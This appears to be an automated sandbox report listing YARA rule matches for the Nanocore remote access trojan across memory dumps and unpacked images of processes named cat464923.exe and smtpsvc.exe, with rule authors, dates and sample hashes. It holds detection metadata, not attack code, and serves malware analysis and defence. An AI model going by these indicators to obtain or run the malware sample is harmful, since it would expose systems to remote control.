Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.2324e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.2324e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.440000.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.440000.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.cat464923.exe.22a4dc8.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.22a4dc8.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.24aeb3c.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.24aeb3c.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
